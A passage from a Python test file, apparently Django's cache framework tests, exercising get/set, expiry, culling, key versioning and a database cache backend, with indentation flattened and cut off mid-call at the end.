def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
# RemovedInDjango41Warning: python-memcached doesn't support .get() with
# default.
supports_get_with_default = True
# Some clients raise custom exceptions when .incr() or .decr() are called
# with a non-integer value.
incr_decr_type_error = TypeError
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_default_used_when_none_is_set(self):
"""If None is cached, get() returns it instead of the default."""
cache.set('key_default_none', None)
self.assertIsNone(cache.get('key_default_none', default='default'))
def test_add(self):
# A key can be added to a cache
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertIs(caches['prefix'].has_key('somekey'), False)
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
cache.set_many({'x': None, 'y': 1})
self.assertEqual(cache.get_many(['x', 'y']), {'x': None, 'y': 1})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
self.assertIs(cache.delete("key1"), True)
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_delete_nonexistent(self):
self.assertIs(cache.delete('nonexistent_key'), False)
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), True)
self.assertIs(cache.has_key("goodbye1"), False)
cache.set("no_expiry", "here", None)
self.assertIs(cache.has_key("no_expiry"), True)
cache.set('null', None)
self.assertIs(
cache.has_key('null'),
True if self.supports_get_with_default else False,
)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
cache.set('null', None)
if self.supports_get_with_default:
self.assertIn('null', cache)
else:
self.assertNotIn('null', cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.incr('null')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.decr('null')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertIs(cache.has_key("expire3"), False)
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
time.sleep(3)
self.assertIs(cache.has_key('expire1'), False)
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertIs(cache.delete(key), True)
self.assertIs(cache.add(key, value), True)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
self.assertIs(cache.delete(key), True)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
self.assertIs(cache.add('binary1-add', compressed_value), True)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Follow memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1), True)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', None), True)
self.assertEqual(cache.get('key2'), 'ham')
self.assertIs(cache.add('key1', 'new eggs', None), False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
self.assertIs(cache.touch('key5', timeout=None), True)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
self.assertIs(cache.add('key2', 'ham', 0), True)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
self.assertIs(cache.touch('key5', timeout=0), True)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache_name, initial_count, final_count):
try:
cull_cache = caches[cull_cache_name]
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test('cull', 50, 29)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 19)
def test_cull_delete_when_store_empty(self):
try:
cull_cache = caches['cull']
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
old_max_entries = cull_cache._max_entries
# Force _cull to delete on first cached record.
cull_cache._max_entries = -1
try:
cull_cache.set('force_cull_delete', 'value', 1000)
self.assertIs(cull_cache.has_key('force_cull_delete'), True)
finally:
cull_cache._max_entries = old_max_entries
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends should warn (except memcached that should
error) on keys that would be refused by memcached. This encourages
portable caching code without making it too difficult to use production
backends with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [{key: 1, 'b': 2}]),
]
try:
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertWarns(CacheKeyWarning) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.warning), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
self.assertIs(cache.add('answer1', 42, version=2), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=2), False)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=1), True)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
self.assertIs(caches['v2'].add('answer2', 42), True)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37), False)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37, version=1), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
self.assertIs(caches['v2'].add('answer3', 42, version=1), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37, version=1), False)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertIs(cache.has_key('answer1'), True)
self.assertIs(cache.has_key('answer1', version=1), True)
self.assertIs(cache.has_key('answer1', version=2), False)
self.assertIs(caches['v2'].has_key('answer1'), False)
self.assertIs(caches['v2'].has_key('answer1', version=1), True)
self.assertIs(caches['v2'].has_key('answer1', version=2), False)
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertIs(cache.delete('answer1'), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertIs(cache.delete('answer2', version=2), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertIs(caches['v2'].delete('answer3'), True)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertIs(caches['v2'].delete('answer4', version=1), True)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertEqual(cache.incr('answer1'), 38)
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertEqual(cache.decr('answer1'), 37)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertEqual(cache.incr('answer2', version=2), 43)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
self.assertEqual(cache.decr('answer2', version=2), 42)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertEqual(caches['v2'].incr('answer3'), 43)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
self.assertEqual(caches['v2'].decr('answer3'), 42)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertEqual(caches['v2'].incr('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
self.assertEqual(caches['v2'].decr('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
cache.set('null', None)
if self.supports_get_with_default:
self.assertEqual(cache.incr_version('null'), 2)
else:
with self.assertRaises(self.incr_decr_type_error):
cache.incr_version('null')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
cache.set('null', None, version=2)
if self.supports_get_with_default:
self.assertEqual(cache.decr_version('null', version=2), 1)
else:
with self.assertRaises(self.incr_decr_type_error):
cache.decr_version('null', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
fetch_middleware = FetchFromCacheMiddleware(empty_response)
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
content = 'Testing cookie serialization.'
def get_response(req):
response = HttpResponse(content)
response.set_cookie('foo', 'bar')
return response
update_middleware = UpdateCacheMiddleware(get_response)
update_middleware.cache = cache
response = update_middleware(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
UpdateCacheMiddleware(lambda req: get_cache_data)(request)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertIsNone(cache.get_or_set('null', None))
if self.supports_get_with_default:
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
else:
self.assertEqual(cache.get('null', 'default'), 'default')
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
self.assertIsNone(cache.get_or_set('null', lambda: None))
if self.supports_get_with_default:
# Previous get_or_set() stores None in the cache.
self.assertIsNone(cache.get('null', 'default'))
else:
self.assertEqual(cache.get('null', 'default'), 'default')
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979)
self.assertIsNone(cache.get('brian', version=3))
def test_get_or_set_racing(self):
with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add:
# Simulate cache.add() failing to add a value. In that case, the
# default value should be returned.
cache_add.return_value = False
self.assertEqual(cache.get_or_set('key', 'default'), 'default')
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super().setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super().tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_get_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2})
cache.set('expired', 'expired', 0.01)
with self.assertNumQueries(1):
self.assertEqual(cache.get_many(['a', 'b']), {'a': 1, 'b': 2})
time.sleep(0.02)
with self.assertNumQueries(2):
self.assertEqual(cache.get_many(['a', 'b', 'expired']), {'a': 1, 'b': 2})
def test_delete_many_num_queries(self):
cache.set_many({'a': 1, 'b': 2, 'c': 3})
with self.assertNumQueries(1):
cache.delete_many(['a', 'b', 'c'])
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 18)
def test_second_call_doesnt_crash(self):
out = io.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Use another table name to avoid the 'table already exists' message.
LOCATION='createcachetable_dry_run_mode'
))
def test_createcachetable_dry_run_mode(self):
out = io.StringIO()
management.call_command('createcachetable', dry_run=True, stdout=out)
output = out.getvalue()
self.assertTrue(output.startswith("CREATE TABLE"))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = io.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
